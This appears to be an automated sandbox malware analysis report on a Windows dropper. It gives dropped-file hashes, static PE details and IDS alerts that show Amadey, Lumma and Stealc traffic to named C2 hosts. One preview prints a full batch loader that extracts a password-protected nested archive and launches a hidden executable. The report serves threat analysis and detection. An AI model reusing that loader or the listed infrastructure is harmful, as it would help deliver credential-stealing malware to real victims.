                                                                                                                                                                                                                                                                          SHA-512:58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\main\main.bat

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exe
                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):440
                                                                                                                                                                                                                                                                          Entropy (8bit):5.0791308599041844
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:QUp+CF16g64CTFMj2LIQLvDHW7PCVGrMLvmuCogLKO8NerxVv:QUpNF16g632CkezWDCVGYTOLv8k7
                                                                                                                                                                                                                                                                          MD5:3626532127E3066DF98E34C3D56A1869
                                                                                                                                                                                                                                                                          SHA1:5FA7102F02615AFDE4EFD4ED091744E842C63F78
                                                                                                                                                                                                                                                                          SHA-256:2A0E18EF585DB0802269B8C1DDCCB95CE4C0BAC747E207EE6131DEE989788BCA
                                                                                                                                                                                                                                                                          SHA-512:DCCE66D6E24D5A4A352874144871CD73C327E04C1B50764399457D8D70A9515F5BC0A650232763BF34D4830BAB70EE4539646E7625CFE5336A870E311043B2BD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:..&cls..@echo off..mode 65,10..title g3g34g34g34g43 (34g34g45h6hj56j56j)..md extracted..ren file.bin file.zip..call 7z.exe e file.zip -p24291711423417250691697322505 -oextracted ..for /l %%i in (7,-1,1) do (..call 7z.exe e extracted/file_%%i.zip -oextracted..)..ren file.zip file.bin..cd extracted..move "in.exe" ../..cd....rd /s /q extracted..attrib +H "in.exe"..start "" "in.exe"..cls..echo Launched 'in.exe'...pause..del /f /q "in.exe"..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main\in.exe
                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1827328
                                                                                                                                                                                                                                                                          Entropy (8bit):7.963282633529333
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:49152:2AVavyjrvfTYx9Z+tylUcecGjcM7B68ue7KhNzw:2AkvyvfTYxTUTj77B68uRe
                                                                                                                                                                                                                                                                          MD5:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                                                                                                          SHA1:D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
                                                                                                                                                                                                                                                                          SHA-256:46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
                                                                                                                                                                                                                                                                          SHA-512:044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...

                                                                                                                                                                                                                                                                          C:\Windows\Tasks\skotes.job

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):290
                                                                                                                                                                                                                                                                          Entropy (8bit):3.3842422977186777
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:OMh4jVX55ZsUEZ+lX1CGdKUe6tFXqYEp5t/uy0lUut0:gjRuQ1CGAFifXVUut0
                                                                                                                                                                                                                                                                          MD5:A5E27F672D48EAD0F425C8E2C8B27096
                                                                                                                                                                                                                                                                          SHA1:2255D74AEF77C6DE37A9B76D4DF01776E668DE9B
                                                                                                                                                                                                                                                                          SHA-256:CB3A7629147E73B73D88078B8ABED4B417B8A871DC63A011940A0793FF1415FD
                                                                                                                                                                                                                                                                          SHA-512:C799C710B64EBD5948024C5C4657C0142CC5F11B763D8982AF30A2B35950DE7C85CA124169FFE63EB94A7E9C19837B34B50564EAB07A71453A0A4BC20A417558
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:.....Ke.P.G.o.w..Y.F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0...................@3P.........................

                                                                                                                                                                                                                                                                          \Device\ConDrv

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):350
                                                                                                                                                                                                                                                                          Entropy (8bit):5.0682682106683945
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:AMMyS3pt+uoQcAxXF2SaioBQypHSTgqF1AivwtHgNmtQFfpap1tNjtv:pMpDh5RwXSTgqFyYwzuJA1tNp
                                                                                                                                                                                                                                                                          MD5:2F644B7E25627553C5731B735473C859
                                                                                                                                                                                                                                                                          SHA1:5A3C2158A1FCF27AE6807A8079894FFE8D33FBEA
                                                                                                                                                                                                                                                                          SHA-256:2B34B0DE62F49C19D1F9A004AD698E2612F7FCD5072F5C9834621C62F15FB55F
                                                                                                                                                                                                                                                                          SHA-512:E83CA818C9785EB3A0297E65F08E22DC9E29A368BCADC9887B64EC746C88B79ACBAD20B4B6D49C07CB819ACE21B00C2BEB083F18A0CD5528D2BD00A7B0C4E802
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:..7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21....Scanning the drive for archives:.. 0M Scan. .1 file, 1799594 bytes (1758 KiB)....Extracting archive: extracted\file_1.zip..--..Path = extracted\file_1.zip..Type = zip..Physical Size = 1799594.... 0%. .Everything is Ok....Size: 1827328..Compressed: 1799594..

                                                                                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Entropy (8bit):6.587568854680756
                                                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                          File name:file.exe
                                                                                                                                                                                                                                                                          File size:2'992'640 bytes
                                                                                                                                                                                                                                                                          MD5:5c8cb972f2920bd6edc98690f1634958
                                                                                                                                                                                                                                                                          SHA1:73d87008bda6fd11921bfad989b48c09ce82b20f
                                                                                                                                                                                                                                                                          SHA256:246affa1629352f335434a02500b288a55592990b1b669a6a5cb112c20f04f8f
                                                                                                                                                                                                                                                                          SHA512:cc9c4e3d03b493778a2475b02e6d0fa14b27688ca09fdbef1ba2e7ace2bb6c591c5e93d0b4596ce1eb1c85252461089193a14390725f01fd4a2a4f1598e21d4d
                                                                                                                                                                                                                                                                          SSDEEP:49152:D5TQ0VpSQkbo7FoWKxx/X0+fI1HARitBDodeFIbi:NfVpSTl/xxPxfI1gRitao
                                                                                                                                                                                                                                                                          TLSH:92D55C62A44DB2CBD48E177885A7CE82587D43B947248CC7AD6C7CBEBD63CC111BAC24
                                                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

                                                                                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                                                                                          Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Entrypoint:0x715000
                                                                                                                                                                                                                                                                          Entrypoint Section:.taggant
                                                                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                          Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                                                          OS Version Major:6
                                                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                                                          File Version Major:6
                                                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                                                          Subsystem Version Major:6
                                                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                                                          Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                                                          jmp 00007FB3E0DF0F7Ah
                                                                                                                                                                                                                                                                          js 00007FB3E0DF0FA3h
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          jmp 00007FB3E0DF2F75h
                                                                                                                                                                                                                                                                          add byte ptr [edi], al
                                                                                                                                                                                                                                                                          or al, byte ptr [eax]
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], dh
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax+00000000h], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [edx], ah
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [ecx], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          adc byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                                          add eax, 0000000Ah
                                                                                                                                                                                                                                                                          add byte ptr [eax], al

                                                                                                                                                                                                                                                                          Data Directories

                                                                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x5d4.rsrc
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x3139300x10qavlzoyx
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x3138e00x18qavlzoyx
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                          Sections

                                                                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                          0x10000x680000x2de0048b1fa121fb20abaf9f06623198d55b6False0.9982863589918256data7.987371951663944IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                          .rsrc0x690000x5d40x4000f7a7b0f90f286572ddd4ee84905b522False0.7109375data5.796620596159941IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                          .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                          qavlzoyx0x6b0000x2a90000x2a9000ee63effc75c1c185a4994c050568f710unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                          ixfbxqpd0x3140000x10000x4000e84e50a80a11ecc6d92c5a1ca258bfdFalse0.7255859375data5.722690628477101IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                          .taggant0x3150000x30000x22007703a4175c4ef10f4bf84fc4c397d00cFalse0.06537224264705882DOS executable (COM)0.7800135601647927IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                                                                          Resources

                                                                                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                          RT_MANIFEST0x3139400x3e4XML 1.0 document, ASCII text0.48092369477911645
                                                                                                                                                                                                                                                                          RT_MANIFEST0x313d240x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                                                                                                                                                                          Imports

                                                                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                                                                          kernel32.dlllstrcpy

                                                                                                                                                                                                                                                                          Possible Origin

                                                                                                                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                          EnglishUnited States

                                                                                                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                                                                                                          Suricata IDS Alerts

                                                                                                                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                          2024-12-21T01:14:06.475463+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.549814185.215.113.4380TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:10.947662+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.54982831.41.244.1180TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:20.549633+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.549823TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:21.884611+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.549852185.215.113.4380TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:23.328958+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.54985831.41.244.1180TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:28.782877+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.549871185.215.113.4380TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:30.236101+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.54987331.41.244.1180TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:35.161864+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.5577501.1.1.153UDP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:35.418961+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.5576281.1.1.153UDP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:35.802477+01002058360ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)1192.168.2.5568491.1.1.153UDP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:37.157206+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.549889185.215.113.4380TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:37.427391+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.549890172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:37.427391+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549890172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:38.388510+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549890172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:38.388510+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549890172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:38.978681+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.54989331.41.244.1180TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:39.145938+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.549897172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:39.145938+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549897172.67.197.170443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:44.180568+01002058397ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pancakedipyps .click)1192.168.2.5561851.1.1.153UDP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:44.360100+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.549906185.215.113.4380TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:45.887085+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.54991031.41.244.1180TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:46.006483+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.549911104.21.23.76443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:46.006483+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549911104.21.23.76443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:46.750584+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549911104.21.23.76443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:46.750584+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549911104.21.23.76443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:47.981783+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.549917104.21.23.76443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:47.981783+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549917104.21.23.76443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:48.777129+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549917104.21.23.76443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:48.777129+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549917104.21.23.76443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:50.493760+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.549923104.21.23.76443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:50.493760+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549923104.21.23.76443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:53.178057+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.549933104.21.23.76443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:53.178057+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549933104.21.23.76443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:54.186505+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549933104.21.23.76443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:55.745500+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.549942104.21.23.76443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:55.745500+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549942104.21.23.76443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:56.572647+01002859378ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M21192.168.2.549941116.203.12.114443TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:56.837587+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.549944185.215.113.4380TCP
                                                                                                                                                                                                                                                                          2024-12-21T01:14:58.336790+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.54995131.41.244.1180TCP
